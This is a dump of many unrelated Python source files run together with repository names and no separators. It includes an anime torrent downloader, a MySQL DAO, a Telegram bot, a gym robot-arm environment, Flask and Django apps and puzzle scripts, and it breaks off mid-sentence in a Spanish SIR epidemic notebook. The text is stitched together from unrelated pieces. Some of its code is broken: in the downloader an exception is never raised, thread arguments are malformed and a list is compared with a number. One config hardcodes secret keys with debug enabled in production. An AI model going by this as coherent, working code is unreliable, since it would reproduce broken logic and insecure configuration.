os.path.join(os.getenv('HOME'), 'PyAnime/') size_dict = { 'KB': 0, 'MB': 1, 'GiB': 2, 'GB': 2 } MAX_THREADS = 5 class RangeValidator: message = 'Please enter valid range' def __init__(self, msg=None): self.message = msg or 
RangeValidator.message def __call__(self, value): if value == '*' or re.fullmatch(r'\d+', value): return value else: reg = re.fullmatch(r'^(\d+)-(\d+)$', value) if reg: return int(reg[1]), int(reg[2]) else: raise validators.ValidationError(self.message) def main(): command = prompt.options('Select a command', options=commands) while command != 'q': command() puts() command = prompt.options('Select a command', options=commands) pass def change_download_location(): to_path = prompt.query('Enter output path (~/PyAnime by default)', validators=[validators.PathValidator()]) print('Path change to \'{:s}\''.format(to_path)) def clear(): os.system('cls' if os.name == 'nt' else 'clear') def request_data(url, params=None): try: req = requests.get(url, params=params) req.raise_for_status() except requests.HTTPError as error: SystemExit('Error occured\n'+error) return req def download_ep(download_path): data = request_data(BASE_URL+download_path) # Implement download code def parse_range(list): for range, size, links in list: if range.isdigit(): yield int(range) elif range.startswith('Vol'): yield int(range.split(' ')[1]) else: reg = re.fullmatch(r'(\d+).+?(\d+)', range) if reg: yield reg.group(1) + ' ' + reg.group(2) else: puts('Detected invalid range') yield None def compare_file_sizes(new, master): reg_new = re.fullmatch(r'([\d\.]+)(\w+)', new) reg_master = re.fullmatch(r'([\d\.]+)(\w+)', master) if reg_new and reg_master: if size_dict[reg_new.group(2)] < size_dict[reg_master.group(2)]\ or float(reg_new.group(1)) < float(reg_master.group(1)): return True return False else: raise SystemExit('Invalid file sizes:', new, master) def filter_queue(queue, low=True): values_dict = dict() print(queue) for i, item in enumerate(queue): if item[0] == '\xa0': continue if item[0] not in values_dict\ or compare_file_sizes(item[1], values_dict[item[0]][1]): values_dict[item[0]] = (i, item[1],) return [queue[int(index)] for index in [i[0] for i in values_dict.values()]] def bulk_download(): search_term = prompt.query('Enter series title') # subber = prompt.query('Enter subber name (Optional)', validators=[]) data = request_data(BASE_URL+'/search/', params={ 'title': search_term # 'subber': subber }) soup = bs4.BeautifulSoup(data.content, 'lxml') if soup.select('center'): puts('No releases found') else: title_entries = soup.select('.release_block .release_title .release_text_contents a') filtered_entries = [] for entry in title_entries: title = entry.getText() if not entry.get('rel') and title not in [entry[0] for entry in filtered_entries]: filtered_entries.append((title, entry.get('href'))) selected = prompt.options('Select anime series', options=[entry[0] for entry in filtered_entries]) wanted_range = prompt.query('Enter episode range (* for all)', validators=[RangeValidator()]) data = request_data(BASE_URL+filtered_entries[int(selected)-1][1]) soup = bs4.BeautifulSoup(data.content, 'lxml') episode_ranges = [tag.getText() for tag in soup.select('.release_block .release_episode')[1:]] file_sizes = [tag.getText() for tag in soup.select('.release_block .release_size')[1:]] download_links = [tag.get('href') for tag in soup.find_all('a', attrs={'type':'application/x-bittorrent'})] assert len(file_sizes) == len(download_links) == len(episode_ranges) episodes = list(zip(episode_ranges, file_sizes, download_links)) download_queue = [] if isinstance(wanted_range, tuple): for i, range in enumerate(parse_range(episodes)): if (isinstance(range, str) and range.split(' ')[0] >= wanted_range[0]\ and range.split(' ')[1] <= 
wanted_range[1]) or\ (wanted_range[0] <= range <= wanted_range[1]): download_queue.append(episodes[i]) elif wanted_range == '*': download_queue = episodes[:] elif wanted_range.isdigit(): for i, range in enumerate(parse_range(episodes)): if isinstance(range, int) and range == int(wanted_range): download_queue.append(episodes[i]) else: continue else: raise SystemExit('Invalid range') download_queue = filter_queue(download_queue) if download_queue: puts(columns(['Episode', 10], ['Size', 10])) for episode in download_queue: puts(columns([episode[0], 10], [episode[1], 10])) else: puts('No entries to download') return input('Proceed with download? (Ctrl-C to exit)') current_downloads = [] for item in download_queue: t = threading.Thread(target=request_data, args=BASE_URL+'item') if current_downloads >= MAX_THREADS: current_downloads[0].join() t.start() for thread in current_downloads: thread.join() puts('Download completed') commands = [ {'selector': '1', 'prompt': 'Bulk download an anime series', 'return': bulk_download}, {'selector': '2', 'prompt': 'Change download location', 'return': change_download_location}, {'selector': '3', 'prompt': 'Quit', 'return': 'q'} ] if __name__ == '__main__': if not os.path.isdir(OUTPATH): os.mkdir(OUTPATH) try: main() except KeyboardInterrupt: puts('\nGoodbye!') import pymysql import Package as pkg import Address as adr class Packagedao(object): def __init__(self, username, password, host, db): self.username = username self.password = password self.host = host self.db = db #QUERYS all packages def query_packages(self): pkglst = [] conn = pymysql.connect(user=self.username, password=self.password, host=self.host, database=self.db) cur = conn.cursor() cur.execute( \ """ SELECT * FROM package """ ) for row in cur: print(row) p = pkg.Package(id=row[0], size_id=row[1], src_id=row[2], dst_id=row[3]) pkglst.append(p) cur.close() conn.close() return pkglst #querys individual packages def query_package(self, pkgid): conn = pymysql.connect(user=self.username, password=self.password, host=self.host, database=self.db) cur = conn.cursor() cur.execute("SELECT * FROM package WHERE pkgid =%s", (pkgid)) row = cur.fetchone() if row: p = pkg.Package(id=row[0], size_id=row[1], src_id=row[2], dst_id=row[3]) else: p = None cur.close() conn.close() return p def insert_package(self, package): #inserts a new package into the database. #connect to db conn = pymysql.connect(user=self.username, password=self.password, host=self.host, database=self.db) cur = conn.cursor() # Insert new package add_package_sql = \ """ INSERT INTO package(pkgid, packagesize_id, src_id, dst_id) VALUES (%s, %s, %s, %s) """ cur.execute(add_package_sql, (package.id, package.size_id, package.src_id, package.dst_id)) conn.commit() cur.close() conn.close() # to do add cool querie functions to see who has most packagees etc. 0 import os from typing import List DOWNLOAD_LOCATION = "data/downloaded/" RESIZED_LOCATION = "data/resized/" ALIGNED_LOCATION = "data/aligned/" ANNOTATED_LOCATION = "data/annotated/" def get_images_in_dir(path: str) -> List[str]: """Returns a sorted list of all filenames of PNG files in directory. PNG should begin with a number, followed by underscore (e.g. 10_hello.png). This number is the key for sorting. 
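    Example (added for illustration, not in the original): given files
    ["2_b.png", "10_hello.png", "1_a.png", "notes.txt"], the function returns
    ["1_a.png", "2_b.png", "10_hello.png"]; the leading integer, not the raw
    string, drives the ordering, so "10_" sorts after "2_".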
""" return sorted([f for f in os.listdir(path) if f.endswith(".png")], key=lambda f: int(f.split("_")[0])) bot/telegram_bot.py import telegram import key from ndb_user import NDB_User import time ''' python-telegram-bot documentation https://python-telegram-bot.readthedocs.io/en/stable/ ''' TELEGRAM_BOT = telegram.Bot(token=key.TELEGRAM_API_TOKEN) def set_webhook(): s = TELEGRAM_BOT.setWebhook(key.WEBHOOK_TELEGRAM_BASE, allowed_updates=['message']) if s: print("webhook setup ok: {}".format(key.WEBHOOK_TELEGRAM_BASE)) else: return "webhook setup failed" def delete_webhook(): TELEGRAM_BOT.deleteWebhook() def get_webhook_info(): print(TELEGRAM_BOT.get_webhook_info()) def get_reply_markup(user, kb, remove_keyboard): reply_markup = None if kb or remove_keyboard: if remove_keyboard: user.set_empy_keyboard() reply_markup = telegram.ReplyKeyboardRemove() else: user.set_keyboard(kb) reply_markup = telegram.ReplyKeyboardMarkup(kb, resize_keyboard=True) return reply_markup def send_message(user, text, kb=None, remove_keyboard=False, markdown=True, sleep=False, **kwargs): #sendMessage(chat_id, text, parse_mode=None, disable_web_page_preview=None, disable_notification=False, # reply_to_message_id=None, reply_markup=None, timeout=None, **kwargs) chat_id = user.serial_number if isinstance(user, NDB_User) else user reply_markup = get_reply_markup(user, kb, remove_keyboard) parse_mode = telegram.ParseMode.MARKDOWN if markdown else None TELEGRAM_BOT.sendMessage( chat_id = chat_id, text = text, reply_markup = reply_markup, parse_mode = parse_mode, **kwargs ) if sleep: time.sleep(0.1) def send_typing_action(user, sleep_secs=None): chat_id = user.serial_number if isinstance(user, NDB_User) else user TELEGRAM_BOT.sendChatAction( chat_id = chat_id, action = telegram.ChatAction.TYPING ) if sleep_secs: time.sleep(sleep_secs) djinnome/indra from copy import deepcopy from indra.databases import hgnc_client from indra.statements import Agent, IncreaseAmount, DecreaseAmount, Evidence class TrrustProcessor(object): """Processor to extract INDRA Statements from Trrust data frame. Attributes ---------- df : pandas.DataFrame The Trrust table to process. statements : list[indra.statements.Statement] The list of INDRA Statements extracted from the table. 
""" def __init__(self, df): self.df = df self.statements = [] def extract_statements(self): """Process the table to extract Statements.""" for _, (tf, target, effect, refs) in self.df.iterrows(): tf_agent = get_grounded_agent(tf) target_agent = get_grounded_agent(target) if effect == 'Activation': stmt_cls = IncreaseAmount elif effect == 'Repression': stmt_cls = DecreaseAmount else: continue pmids = refs.split(';') for pmid in pmids: stmt = make_stmt(stmt_cls, tf_agent, target_agent, pmid) self.statements.append(stmt) def make_stmt(stmt_cls, tf_agent, target_agent, pmid): """Return a Statement based on its type, agents, and PMID.""" ev = Evidence(source_api='trrust', pmid=pmid) return stmt_cls(deepcopy(tf_agent), deepcopy(target_agent), evidence=[ev]) def get_grounded_agent(gene_name): """Return a grounded Agent based on an HGNC symbol.""" db_refs = {'TEXT': gene_name} if gene_name in hgnc_map: gene_name = hgnc_map[gene_name] hgnc_id = hgnc_client.get_hgnc_id(gene_name) if not hgnc_id: hgnc_id = hgnc_client.get_current_hgnc_id(gene_name) if hgnc_id: db_refs['HGNC'] = hgnc_id up_id = hgnc_client.get_uniprot_id(hgnc_id) if up_id: db_refs['UP'] = up_id agent = Agent(gene_name, db_refs=db_refs) return agent hgnc_map = { 'CTGF': 'CCN2', 'CYR61': 'CCN1', 'MKL1': 'MRTFA', 'NOV': 'CCN3', 'RFWD2': 'COP1', 'SALL4A': 'SALL4', 'STAT5': 'STAT5A', 'TRAP': 'ACP5', 'AES': 'TLE5', 'SEPT7': 'SEPTIN7' } # -*- coding: utf-8 -*- from django.urls import path from . import views from .views import (ReportListView, DocListView, PatListView, ReportDetailView, ReportCreateView, ReportUpdateView, ReportDeleteView, PatientCreateView, PatientDeleteView, PatientUpdateView, DocReportListView, PatReportListView) urlpatterns = [ path('', ReportListView.as_view(), name='Hospital-Home'), # path('', views.home, name='Hospital-Home'), path('about/', views.about, name='Hospital-About'), path('diagreport//', ReportDetailView.as_view(), name='report-detail'), path('diagreport/new/', ReportCreateView.as_view(), name='report-create'), path('diagreport//update/', ReportUpdateView.as_view(), name='report-update'), path('diagreport//delete/', ReportDeleteView.as_view(), name='report-delete'), path('patient/new/>', PatientCreateView.as_view(), name='patient-create'), path('patient//update/', PatientUpdateView.as_view(), name='patient-update'), path('patient//delete/', PatientDeleteView.as_view(), name='patient-delete'), path('user//', DocReportListView.as_view(), name='Doc-Report'), path('patient//', PatReportListView.as_view(), name='Pat-Report'), path('listdocs/', DocListView.as_view(), name='Doc-List'), path('listpats//', PatListView.as_view(), name='Pat-List') ] y0psolo/YAD load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive") def hadoop_repository(): http_archive( name = "hadoop_3", build_file = "//ext/hadoop:BUILD", sha256 = "ad770ae3293c8141cc074df4b623e40d79782d952507f511ef0a6b0fa3097bac", strip_prefix = "hadoop-3.3.1/", urls = ["https://dlcdn.apache.org/hadoop/common/hadoop-3.3.1/hadoop-3.3.1.tar.gz"], ) ghliu/10703_HW3deerl_hw3_src/deeprl_hw3/arm_env.py """2-link Planar Arm.""" import numpy as np import gym import gym.spaces class TwoLinkArmEnv(gym.core.Env): DOF = 2 metadata = { 'render.modes': ['human', 'rgb_array'], 'video.frames_per_second': 15 } def __init__(self, Q=None, R=None, goal_q=None, init_q=None, init_dq=None, dt=1e-3, l1=.5, l2=.75, m1=.33, m2=.55, izz1=15., izz2=8., noise_free=True, noise_mu=None, noise_sigma=None): self.observation_space = gym.spaces.Box( low=np.array([-np.pi, -np.pi, -np.inf, 
-np.inf]), high=np.array([np.pi, np.pi, np.inf, np.inf])) self.action_space = gym.spaces.Box( low=np.array([-np.inf, -np.inf]), high=np.array([np.inf, np.inf])) if Q is None: self.Q = np.zeros((self.DOF * 2, self.DOF * 2)) self.Q[:self.DOF, :self.DOF] = np.eye(self.DOF) * 1000.0 else: self.Q = Q if R is None: self.R = np.eye(self.DOF) * 0.001 else: self.R = R self.dt = dt self._goal_q = goal_q self.goal_dq = np.zeros(self.DOF) self.init_q = np.zeros(self.DOF) if init_q is None else init_q self.init_dq = np.zeros(self.DOF) if init_dq is None else init_dq self.l1 = l1 self.l2 = l2 self.m1 = m1 self.m2 = m2 self.izz1 = izz1 self.izz2 = izz2 self.K1 = ((1 / 3. * self.m1 + self.m2) * self.l1**2. + 1 / 3. * self.m2 * self.l2**2.) self.K2 = self.m2 * self.l1 * self.l2 self.K3 = 1 / 3. * self.m2 * self.l2**2. self.K4 = 1 / 2. * self.m2 * self.l1 * self.l2 # how much noise to add to input signal self.noise_free = noise_free self.noise_mu = np.zeros( (self.DOF, )) if noise_mu is None else noise_mu self.noise_sigma = np.ones( (self.DOF, )) if noise_sigma is None else noise_sigma self.reset() self.viewer = None def get_jacobian(self): jacobian = np.zeros((self.DOF, self.DOF)) jacobian[0, 1] = self.l2 * -np.sin(self.q[0] + self.q[1]) jacobian[1, 1] = self.l2 * np.cos(self.q[0] + self.q[1]) jacobian[0, 0] = self.l1 * -np.sin(self.q[0]) + jacobian[0, 1] jacobian[1, 0] = self.l1 * np.cos(self.q[0]) + jacobian[1, 1] return jacobian def _reset(self): if self._goal_q is None: self.goal_q = (2 * np.pi) * np.random.rand(self.DOF) - np.pi else: self.goal_q = self._goal_q.copy() self.q = self.init_q.copy() self.dq = self.init_dq.copy() self.t = 0. return np.hstack((self.q, self.dq)) @property def position(self): return np.copy(self.q) @property def velocity(self): return np.copy(self.dq) @property def state(self): return np.hstack((self.q, self.dq)) @state.setter def state(self, value): self.q = value[:self.DOF, ...] self.dq = value[self.DOF:, ...] @property def goal(self): return np.hstack((self.goal_q, self.goal_dq)) def _step(self, u, dt=None): if dt is None: dt = self.dt if not self.noise_free: u0_noise = np.random.normal(self.noise_mu[0], self.noise_sigma[0]) u1_noise = np.random.normal(self.noise_mu[1], self.noise_sigma[1]) u[0] += u0_noise u[1] += u1_noise u = np.clip(u, self.action_space.low, self.action_space.high) C2 = np.cos(self.q[1]) S2 = np.sin(self.q[1]) M11 = (self.K1 + self.K2 * C2) M12 = (self.K3 + self.K4 * C2) M21 = M12 M22 = self.K3 H1 = (-self.K2 * S2 * self.dq[0] * self.dq[1] - 1 / 2.0 * self.K2 * S2 * self.dq[1]**2.0) H2 = 1 / 2. * self.K2 * S2 * self.dq[0]**2. ddq1 = ((H2 * M11 - H1 * M21 - M11 * u[1] + M21 * u[0]) / (M12**2. 
- M11 * M22)) ddq0 = (-H2 + u[1] - M22 * ddq1) / M21 self.dq += np.array([ddq0, ddq1]) * dt self.q += self.dq * dt self.t += dt # calculate the reward x_diff = np.hstack((self.q, self.dq)) - np.hstack( (self.goal_q, self.goal_dq)) reward = -x_diff.dot(self.Q).dot(x_diff) - u.dot(self.R).dot(u) reward *= self.dt is_done = False if np.allclose( self.goal_q, self.q, atol=.01) and np.allclose( self.goal_dq, self.dq, atol=.01): is_done = True return np.hstack((self.q, self.dq)), reward, is_done, {} def _render(self, mode='human', close=False): if close: if self.viewer is not None: self.viewer.close() self.viewer = None return from gym.envs.classic_control import rendering l, r, t, b = 0, 1, .1, -.1 if self.viewer is None: self.viewer = rendering.Viewer(500, 500) max_arm_length = 2 * self.l1 + self.l2 bounds = 1.5 * max_arm_length self.viewer.set_bounds(-bounds, bounds, -bounds, bounds) # add goal geoms link1_goal = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)]) link1_goal_transform = rendering.Transform(rotation=self.goal_q[0]) link1_goal.add_attr(link1_goal_transform) link1_goal._color.vec4 = (1., 0., 0., 0.25) self.viewer.add_onetime(link1_goal) p1_goal = [ 2 * self.l1 * np.cos(self.goal_q[0]), 2 * self.l1 * np.sin(self.goal_q[0]) ] link2_goal = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)]) link2_goal_transform = rendering.Transform( rotation=self.goal_q[0] + self.goal_q[1], translation=tuple(p1_goal)) link2_goal.add_attr(link2_goal_transform) link2_goal._color.vec4 = (0., 0., 1., 0.25) self.viewer.add_onetime(link2_goal) p1 = [2 * self.l1 * np.cos(self.q[0]), 2 * self.l1 * np.sin(self.q[0])] # add the arm geoms link1 = self.viewer.draw_polygon([(l, b), (l, t), (r, t), (r, b)]) link1_transform = rendering.Transform(rotation=self.q[0]) link1.add_attr(link1_transform) link1.set_color(1., 0., 0.) link2 = self.viewer.draw_polygon([(l, b), (l, t), (r, t), (r, b)]) link2_transform = rendering.Transform( rotation=self.q[0] + self.q[1], translation=tuple(p1)) link2.add_attr(link2_transform) link2.set_color(0., 0., 1.) return self.viewer.render(return_rgb_array=(mode == 'rgb_array')) class LimitedTorqueTwoLinkArmEnv(TwoLinkArmEnv): def __init__(self, max_torques=None, **kwargs): super(LimitedTorqueTwoLinkArmEnv, self).__init__(**kwargs) if max_torques is None: max_torques = np.array([10.0, 10.0]) self.action_space = gym.spaces.Box(low=-max_torques, high=max_torques) # Copyright 2018 JanusGraph Python Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from gremlin_python.process.traversal import P class Geo(object): """ This class implements all the JanusGraph-based Geo Predicates. """ @staticmethod def geoContains(value): """ The method is used for JanusGraph geoContains predicate. GeoContains predicate holds true when one object is contained by another. The query returns the GeoShapes which contains the GeoShape being passed/queried. 
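    Example (added, hedged): assuming a gremlin-python traversal source g and a
    GeoShape value point, neither of which appears in this file, vertices whose
    "boundary" property contains that point could be queried with
        g.V().has("boundary", Geo.geoContains(point)).toList()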
Args: value (GeoShape): The GeoShape to query for and return all results which are present inside this GeoShape Returns: bool: Returns true iff the GeoShape contains the value being queried """ return P("geoContains", value) @staticmethod def geoWithin(value): """ The method is used for JanusGraph geoWithin predicate. GeoWithin predicate holds true when one object is within another. The query returns the GeoShapes which are present inside/within the GeoShape being passed/queried. Args: value (GeoShape): The GeoShape to query for and return all results within this this GeoShape if present. Returns: bool: Returns true iff the GeoShape is within the value being queried """ return P("geoWithin", value) ammyg/TUMcalendarTUMCalendarTools/apps.py1-10 from django.apps import AppConfig class TumcalendartoolsConfig(AppConfig): name = 'TUMCalendarTools' ov1d1u/telepatmanager from PyQt5 import QtGui, QtWidgets from PyQt5.QtCore import QCoreApplication class ModelItem(QtGui.QStandardItem): def __init__(self, name, model): self.name = name self.model = model icon = QCoreApplication.instance().style().standardIcon(QtWidgets.QStyle.SP_FileIcon) super(ModelItem, self).__init__(icon, name) def show_name(self, show): pass #!/usr/bin/env python # -*- coding: utf-8 -*- import os basedir = os.path.abspath(os.path.dirname(__file__)) ''' This file houses the config files for the whole of the project. There are 3 types of config. 1. Production : That you may set on Production 2. ProdDemo : for engineerinme.com 3. Development : local testing ''' class Config(object): FAS_OPENID_ENDPOINT = 'http://id.fedoraproject.org/' FAS_CHECK_CERT = True ADMIN_GROUP = ['provenpackager', 'summer-coding '] # Also, defined in the modules/admin/views.py WHOOSH_BASE = os.path.join(basedir, 'search') DEBUG = True MAIL_SERVER = 'smtp.gmail.com' MAIL_PORT = 465 MAIL_USE_TLS = False MAIL_USE_SSL = True MAIL_USERNAME = '', MAIL_PASSWORD = '********', EXTERNAL_URL = "http://demo.engineerinme.com" ADMINS = ['', ''] UPLOAD_TOPIC = "fedoracollege.media.upload" CONTENT_EDIT_TOPIC = "fedoracollege.content.edit" CONTENT_CREATE_TOPIC = "fedoracollege.content.added" ALLOWED_EXTENSIONS = { 'video': ['ogg', 'ogv'], 'image': ['jpeg', 'png', 'jpg'], 'doc': ['pdf'], 'audio': ['mp3', 'flac'] } CSRF_ENABLED = True CSRF_SESSION_KEY = "f3do$a" class ProductionConfig(Config): DEBUG = True SECRET_KEY = 'FEDORA-DEMO' PGSQL_USER = "postgres" PGSQL_PASS = "" PGSQL_DATABASE = "fedora" SQLALCHEMY_DATABASE_URI = "postgresql://" + \ PGSQL_USER + ":" + PGSQL_PASS + "@localhost/" + PGSQL_DATABASE SQLALCHEMY_ECHO = False DEBUG_TOOLBAR = False UPLOADS_FOLDER = '/home/engineer/fedora-college/' + \ 'fedora_college/static/uploads/' STATIC_FOLDER = '/home/engineer/fedora-college/fedora_college/static' # DEBUG = False # TESTING = False # DEBUG_TB_PROFILER_ENABLED = False # DEBUG_TB_INTERCEPT_REDIRECTS = False class ProductionConfigDemo(Config): DEBUG = True SECRET_KEY = 'FEDORA-DEMO' PGSQL_USER = "postgres" PGSQL_PASS = "" PGSQL_DATABASE = "fedora" SQLALCHEMY_DATABASE_URI = "postgresql://" + \ PGSQL_USER + ":" + PGSQL_PASS + "@localhost/" + PGSQL_DATABASE DEBUG_TOOLBAR = True SQLALCHEMY_ECHO = True UPLOADS_FOLDER = '/home/engineer/fedora-college/' + \ 'fedora_college/static/uploads/' STATIC_FOLDER = '/home/engineer/fedora-college/fedora_college/static' class DevelopmentConfig(Config): DEBUG = True SECRET_KEY = 'FEDORA-DEMO' SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'fedoracollege.db') DEBUG_TOOLBAR = True SQLALCHEMY_ECHO = True DATABASE_CONNECT_OPTIONS 
= {} UPLOADS_FOLDER = os.path.realpath('.') + '/fedora_college/static/uploads/' STATIC_FOLDER = os.path.realpath('.') + '/fedora_college/static/' class TestingConfig(Config): TESTING = True SECRET_KEY = 'FEDORA-TEST' ((yield from abc) for x in iter) # EXPECTED: [ ..., CODE_START(''), ..., LOAD_GLOBAL('abc'), GET_YIELD_FROM_ITER(0), LOAD_CONST(None), YIELD_FROM(0), YIELD_VALUE(0), ... ] xltpl/config.py class Config(): def __init__(self): self.debug = False config = Config()Azure/azure-batch-apps-python #------------------------------------------------------------------------- # The Azure Batch Apps Python Client # # Copyright (c) Microsoft Corporation. All rights reserved. # # The MIT License (MIT) # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the ""Software""), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # #-------------------------------------------------------------------------- """ A sample script showing use of the batchapps module to construct and submit an arbitrary job. """ import getpass import sys import webbrowser from batchapps import ( FileManager, JobManager, Credentials, Configuration) from batchapps.credentials import AzureOAuth from batchapps.exceptions import ( AuthenticationException, RestCallException, InvalidConfigException) LOG_LEVEL = "debug" ASSET_DIR = "//Path/To/Assets/Directory" # These settings will be specific to a users Batch Apps service. ENDPOINT = "myservice.batchapps.core.windows.net" ACCOUNT_ID = "ClientID=abcd-1234-efgh-5678;TenantID=" ACCOUNT_KEY = "********" def authentication(mode): """ Authenticates a username against a stored password, if any, otherwise requires a password is to be entered. :Args: - cfg (:class:`.Configuration`): an instance of class Configuration as returned by create_config() :Returns: - a :class:`.Credentials` instance object """ try: return AzureOAuth.get_unattended_session(config=mode) except (AuthenticationException, InvalidConfigException) as e: print("Could not get unattended session: {0}".format(e)) try: auth_url = AzureOAuth.get_authorization_url(config=mode)[0] webbrowser.open(auth_url) redirect_url = input("Please enter authentication url: ") return AzureOAuth.get_authorization_token(redirect_url, config=mode) except (AuthenticationException, InvalidConfigException) as e: raise RuntimeError("Failed to authenticate: {0}".format(e)) def create_config(): """ Looks for configuration settings for specified application, otherwise creates new configuration, sets chosen log_level. :Returns: - a :class:`.Configuration` instance object """ global LOG_LEVEL if input("Run in debug mode? 
(yes/no)")[0].lower() == 'n': LOG_LEVEL = "info" try: # Look for application in existing config file config = Configuration(log_level=LOG_LEVEL, jobtype="MyApp") print("Config found.") return config except InvalidConfigException: print("Valid config not found. Attempting to create new config.") try: config = Configuration(log_level=LOG_LEVEL) config.aad_config(endpoint=ENDPOINT, account=ACCOUNT_ID, key=ACCOUNT_KEY, unattended=True) config.add_jobtype("MyApp") config.current_jobtype("MyApp") # Examples of default config settings for your job config.set("width", "500") config.set("height", "500") # Set MyApp to be the default job type config.set_default_jobtype() except InvalidConfigException as e: raise RuntimeError("Invalid Configuration: {0}".format(e)) finally: config.save_config() return config def submit_job(auth, config): """ Create a new job submission and send it to the cloud. :Args: - auth :class:`.Credentials`: instance of the Credentials class as returned by authentication() - config :class:`.Configuration`: instance of the Configuration class as returned by create_config() """ asset_mgr = FileManager(auth, cfg=config) job_mgr = JobManager(auth, cfg=config) # Converts directory contents to a FileCollection file_collection = asset_mgr.files_from_dir(ASSET_DIR) new_job = job_mgr.create_job("Test Job", files=file_collection) # Set various job parameters. The pre-configured parameters for the # job type can be found using new_job.get_default_params(). new_job.instances = 5 # Number of machines to work on the job. new_job.start = 1 new_job.end = 10 new_job.numFrames = 10 # This sets the file that will be run to start the job. # In this case the first file in the FileCollection. new_job.set_job_file(file_collection[0]) # Upload all files needed for the job. 
new_job.required_files.upload(threads=4) try: submission = new_job.submit() print("New job submitted with ID: {0}".format(submission['jobId'])) except RestCallException as e: print("Job failed: {0}".format(e)) if __name__ == "__main__": try: cfg = create_config() creds = authentication(cfg) submit_job(creds, cfg) except RuntimeError as exp: print("Job failed: {0}".format(exp)) import time from flask import Flask, render_template, request from werkzeug.utils import secure_filename from werkzeug.exceptions import RequestEntityTooLarge from waitress import serve import cv2 import numpy as np from tensorflow.keras.models import load_model import hddUsage app = Flask(__name__) app.config['MAX_CONTENT_LENGTH'] = 512 * 1024 * 5 last_executed = 0 def predict_images(image_size, image): size = image_size new_model = load_model("models/nsfw_classifier_v9.h5") test = image test_img = cv2.imread(test, cv2.IMREAD_UNCHANGED) test_img_re = cv2.resize(test_img, (size, size), interpolation=cv2.INTER_AREA) print(test_img.shape) test_img = np.expand_dims(test_img_re, axis=0) print(test_img.shape) raw = new_model.predict(test_img) result = raw > 0.5 return result[0][0] @app.route('/upload', endpoint='upload_file') def upload_file(): space_free = hddUsage.get_free_space_mb(".") print("Disk free : {}".format(space_free)) if space_free > 40000: return render_template('upload2.html') else: return render_template('space_error.html') @app.route('/uploader', methods=['GET', 'POST'], endpoint='upload_file2') def upload_file(): global last_executed age = time.time() - last_executed # print("Age : {}".format(age)) if request.method == 'POST' and age >= 6: f = request.files['file'] # print(f.filename) try: if request.files['file'].filename == '': return render_template('upload2.html') else: time_var = int(time.time()) f.save("images/{}_{}.{}".format(secure_filename(f.filename).split(".")[0], time_var, secure_filename(f.filename).split(".")[1])) last_executed = time.time() is_nsfw = predict_images(306, "images/{}_{}.{}".format(secure_filename(f.filename).split(".")[0], time_var, secure_filename(f.filename).split(".")[1])) if is_nsfw: return 'Picture is not safe for work!' else: return 'Picture is probably safe for work!' except Exception as e: # print("Size : {}".format(f.content_length)) return app_handle_413(e) elif age < 60: return 'Time since last operation executed is less than 1 Minute :: Wait for {} Seconds, Please wait.'.format(60 - int(age)) @app.errorhandler(413) @app.errorhandler(RequestEntityTooLarge) def app_handle_413(e): return 'File Too Large :: {}'.format(str(e)), 413 if __name__ == '__main__': # app.run(debug=False) serve(app, host='0.0.0.0', port=5000) ''' Find the smallest cube for which exactly five permutations of its digits are cube. 
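(Added, hedged aside: the brute-force search below re-checks every digit
permutation of each cube and only scans roots 1000-1199, which is too small a
range to reach the smallest qualifying cube, a 12-digit number. A cheaper, more
conventional approach, sketched here under the assumption that grouping cubes
by their sorted-digit signature is acceptable, is:)

from collections import defaultdict

def smallest_cube_with_n_permuted_cubes(n=5, max_root=10000):
    # digit signature -> all cubes whose digits are permutations of one another
    groups = defaultdict(list)
    for i in range(1, max_root):
        groups["".join(sorted(str(i ** 3)))].append(i ** 3)
    candidates = [min(cubes) for cubes in groups.values() if len(cubes) == n]
    return min(candidates) if candidates else None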
''' import math, itertools print(math.pow(8, 1/3).is_integer()) tried = {} for i in range(1000, 1200): cb = int(math.pow(i, 3)) #print(cb) #print(math.pow(int(cb), 1/3)) roots = 1 tried[i] = [str(cb)] for x in itertools.permutations(str(cb)): x = ''.join(x) if x not in tried[i]: #print('x =', x) y = round(math.pow(int(x), 1/3)) #print(y**3, x) if y**3 == int(x): roots += 1 tried[i].append(x) print(roots, i, y, x) if roots == 5: print(cb) break huangyonghome/blog10-100 #!/usr/bin/env python # -*- coding:utf-8 -*- # Author:Lyon import greenlet import time def add1(): num = 1 for i in range(10000000): num *= i g2.switch() def add2(): num = 1 for i in range(10000000): num *= i g1.switch() start_time = time.time() g1 = greenlet.greenlet(add1) g2 = greenlet.greenlet(add2) g1.switch() end_time = time.time() print(end_time - start_time) # coding: utf-8 # # SIR version 01.01 # ## El modelo epidémico de SIR # Una descripción matemática simple de la propagación de una enfermedad en una población es el llamado modelo SIR, que divide la población (fija) de N individuos en tres "compartimentos" que pueden variar en función del tiempo, t: # # - S( t) son aquellos susceptibles pero aún no infectados con la enfermedad; # - I( t) es la cantidad de individuos infecciosos; # - R( t) son aquellos individuos que se han recuperado de la enfermedad y ahora tienen inmunidad contra ella. # # El modelo SIR describe el cambio en la población de cada uno de estos compartimentos en términos de dos parámetros, $\beta$ y $\gamma$. # # $\beta$ describe la tasa de contacto efectiva de la 